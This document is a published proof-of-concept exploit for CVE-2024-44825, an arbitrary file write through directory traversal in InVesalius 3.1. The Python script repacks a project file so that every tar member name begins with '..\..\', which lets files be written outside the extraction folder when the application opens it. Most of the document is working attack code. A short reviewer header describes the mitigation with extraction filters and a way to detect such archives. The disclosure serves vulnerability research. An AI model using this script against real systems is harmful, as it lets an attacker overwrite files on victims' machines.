# Exploit Title: Invesalius 3.1 - Arbitrary File Write using Directory Traversal
# Discovered By: Riccardo Degli Esposti (partywave)
# Exploit Author: Riccardo Degli Esposti (partywave)
# Vendor Homepage: https://invesalius.github.io/
# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius
# Version: from 3.1.99995 to nightly
# Tested on: Windows
# CVE-ID: CVE-2024-44825
#
# Reviewer summary (defensive reading of this PoC):
#   * The script repacks a project archive so that every member name starts
#     with "..\\..\\"; the write outside the destination directory only
#     happens if the consuming application extracts member names as-is.
#   * Mitigation on the extracting side: resolve each member name against the
#     destination and reject absolute paths or names that escape it. Python's
#     tarfile extraction filters (PEP 706, e.g. extractall(..., filter="data"))
#     are designed to refuse such members.
#   * Detection: project archives whose member names contain ".." path
#     components are not produced by a normal save and can be flagged before
#     they are opened.

import tarfile
import os
import zipfile

# Disclaimer:
# Tested on Windows.
# Edit every [CHANGEME] before running this script.

# Step 0: Set up local paths (adapt them to your environment).
zip_file_path = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME].zip'
extracted_folder = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME]'
output_tar = 'C:\\users\\[CHANGEME]\\downloads\\local-output.inv3'
main_plist_path = os.path.join(extracted_folder, 'main.plist')

# Make sure the extraction directory exists before unpacking into it.
os.makedirs(extracted_folder, exist_ok=True)

# Step 1: Extract the ZIP file into the working folder.
with zipfile.ZipFile(zip_file_path, 'r') as source_zip:
    source_zip.extractall(extracted_folder)

# Step 2: Edit main.plist so the repacked project is visibly different.
# This is only a marker proving the modified XML is the one that gets loaded.
with open(main_plist_path, 'r') as plist_in:
    main_plist_content = plist_in.read()

main_plist_content = main_plist_content.replace(
    'ProMED CT 0051',
    'This is a confirmation modifying the XML',
)

with open(main_plist_path, 'w') as plist_out:
    plist_out.write(main_plist_content)


# Step 3: Create the tar archive.
# Adapt the prefix below to where you want to write.
def rename(tarinfo):
    """Prefix the member name with a parent-directory traversal path.

    Used as the ``filter`` callback of ``TarFile.add``: it receives the
    ``TarInfo`` about to be stored, rewrites its ``name`` in place and
    returns the same object so the member is kept in the archive.
    """
    tarinfo.name = "..\\..\\[CHANGEME]\\" + tarinfo.name
    return tarinfo


with tarfile.open(output_tar, "w:xz") as tar:
    for dirpath, _, filenames in os.walk(extracted_folder):
        for filename in filenames:
            member_path = os.path.join(dirpath, filename)
            # Store each file under its path relative to the extracted tree;
            # rename() then prepends the traversal prefix to that name.
            relative_name = os.path.relpath(member_path, extracted_folder)
            tar.add(member_path, arcname=relative_name, filter=rename)

# Bare expression: has no effect when run as a script; in an interactive
# session it echoes the path of the archive that was written.
output_tar